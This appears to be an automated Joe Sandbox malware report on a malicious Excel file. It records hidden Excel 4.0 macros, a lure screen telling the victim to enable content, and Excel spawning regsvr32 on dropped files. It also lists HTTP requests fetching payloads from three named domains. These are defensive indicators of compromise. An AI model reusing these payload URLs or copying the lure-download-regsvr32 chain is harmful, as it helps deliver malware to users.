Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Exploit.Siggen3.20906.5188.743

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.20906.5188.743 (renamed file extension from 743 to xls)
Analysis ID:493727
MD5:7b83b99dace5664b9ab5c0c3882be408
SHA1:4c4893beca92234c023ee2dfff759e155c643ed3
SHA256:e005a59b0ab458c8a1ab6883e17504382bd72d2e9de8eb99c785de520c258c0c
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1500 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2428 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2576 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2132 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x3a8aa:$s1: Excel
  • 0x3b94a:$s1: Excel
  • 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1500, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 2428

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsVirustotal: Detection: 15%Perma Link
    Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsReversingLabs: Detection: 22%
    Multi AV Scanner detection for domain / URLShow sources
    Source: https://mercanets.com/9DPZqAfZdq5z/key.xmlVirustotal: Detection: 6%Perma Link
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: unknownHTTPS traffic detected: 199.79.63.251:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.251.80.22:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.222.225.250:443 -> 192.168.2.22:49169 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 199.79.63.251:443
    Source: global trafficDNS query: name: gillcart.com
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 199.79.63.251:443
    Source: global trafficHTTP traffic detected: GET /Cdpmoyhr/key.xml HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gillcart.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /MeOlE9Xxd/key.xml HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: geit.inConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /9DPZqAfZdq5z/key.xml HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mercanets.comConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 29 Sep 2021 21:38:44 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html;charset=utf-8
    Source: regsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: regsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
    Source: regsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
    Source: regsvr32.exe, 00000002.00000002.451936765.0000000004B57000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432788752.0000000004B77000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415998008.0000000004A37000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: regsvr32.exe, 00000002.00000002.451936765.0000000004B57000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432788752.0000000004B77000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415998008.0000000004A37000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: regsvr32.exe, 00000002.00000002.451150137.00000000039E0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432211092.0000000003A00000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415415341.0000000003A10000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000002.00000002.450721197.0000000001C50000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.431900554.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415019465.0000000001DC0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000002.00000002.451936765.0000000004B57000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432788752.0000000004B77000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415998008.0000000004A37000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: regsvr32.exe, 00000002.00000002.451936765.0000000004B57000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432788752.0000000004B77000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415998008.0000000004A37000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: regsvr32.exe, 00000002.00000002.451150137.00000000039E0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432211092.0000000003A00000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415415341.0000000003A10000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: regsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: regsvr32.exe, 00000002.00000002.451936765.0000000004B57000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432788752.0000000004B77000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415998008.0000000004A37000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: regsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\key[1].htmJump to behavior
    Source: unknownDNS traffic detected: queries for: gillcart.com
    Source: global trafficHTTP traffic detected: GET /Cdpmoyhr/key.xml HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gillcart.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /MeOlE9Xxd/key.xml HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: geit.inConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /9DPZqAfZdq5z/key.xml HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mercanets.comConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 199.79.63.251:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.251.80.22:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.222.225.250:443 -> 192.168.2.22:49169 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne :cted View.
    Source: Screenshot number: 4Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne :cted View.
    Source: Screenshot number: 8Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
    Source: Screenshot number: 12Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Screenshot number: 12Screenshot OCR: Enable Content (i) SECURITY WARNING Macros have been disabled. Enable Content If you are using a m
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
    Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsOLE indicator, VBA macros: true
    Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsVirustotal: Detection: 15%
    Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsReversingLabs: Detection: 22%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
    Source: regsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCCCF.tmpJump to behavior
    Source: classification engineClassification label: mal80.expl.winXLS@7/0@3/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
    Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
    Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
    Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe TID: 2984Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\System32\regsvr32.exe TID: 2632Thread sleep count: 56 > 30
    Source: C:\Windows\System32\regsvr32.exe TID: 772Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\System32\regsvr32.exe TID: 1268Thread sleep count: 32 > 30
    Source: C:\Windows\System32\regsvr32.exe TID: 2252Thread sleep time: -60000s >= -30000s

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection1Disable or Modify Tools1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol14Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer4SIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls15%VirustotalBrowse
    SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls22%ReversingLabsDocument-Excel.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    mercanets.com0%VirustotalBrowse
    geit.in0%VirustotalBrowse
    gillcart.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://geit.in/MeOlE9Xxd/key.xml3%VirustotalBrowse
    https://geit.in/MeOlE9Xxd/key.xml0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    https://gillcart.com/Cdpmoyhr/key.xml4%VirustotalBrowse
    https://gillcart.com/Cdpmoyhr/key.xml0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    https://mercanets.com/9DPZqAfZdq5z/key.xml7%VirustotalBrowse
    https://mercanets.com/9DPZqAfZdq5z/key.xml0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    mercanets.com
    162.222.225.250
    truefalseunknown
    geit.in
    162.251.80.22
    truefalseunknown
    gillcart.com
    199.79.63.251
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://geit.in/MeOlE9Xxd/key.xmlfalse
    • 3%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://gillcart.com/Cdpmoyhr/key.xmlfalse
    • 4%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://mercanets.com/9DPZqAfZdq5z/key.xmltrue
    • 7%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000002.00000002.451936765.0000000004B57000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432788752.0000000004B77000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415998008.0000000004A37000.00000002.00020000.sdmpfalse
      high
      http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpfalse
        high
        http://investor.msn.comregsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpfalse
            high
            http://www.icra.org/vocabulary/.regsvr32.exe, 00000002.00000002.451936765.0000000004B57000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432788752.0000000004B77000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415998008.0000000004A37000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000002.00000002.451150137.00000000039E0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432211092.0000000003A00000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415415341.0000000003A10000.00000002.00020000.sdmpfalse
              high
              http://investor.msn.com/regsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpfalse
                high
                http://www.%s.comPAregsvr32.exe, 00000002.00000002.451150137.00000000039E0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432211092.0000000003A00000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415415341.0000000003A10000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                low
                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000002.00000002.451936765.0000000004B57000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432788752.0000000004B77000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415998008.0000000004A37000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oeregsvr32.exe, 00000002.00000002.451672317.0000000004970000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.432587369.0000000004990000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415814445.0000000004850000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllregsvr32.exe, 00000002.00000002.450721197.0000000001C50000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.431900554.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.415019465.0000000001DC0000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  199.79.63.251
                  gillcart.comUnited States
                  394695PUBLIC-DOMAIN-REGISTRYUSfalse
                  162.251.80.22
                  geit.inUnited States
                  394695PUBLIC-DOMAIN-REGISTRYUSfalse
                  162.222.225.250
                  mercanets.comUnited States
                  394695PUBLIC-DOMAIN-REGISTRYUSfalse

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:493727
                  Start date:29.09.2021
                  Start time:23:37:57
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 6s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:SecuriteInfo.com.Exploit.Siggen3.20906.5188.743 (renamed file extension from 743 to xls)
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal80.expl.winXLS@7/0@3/3
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
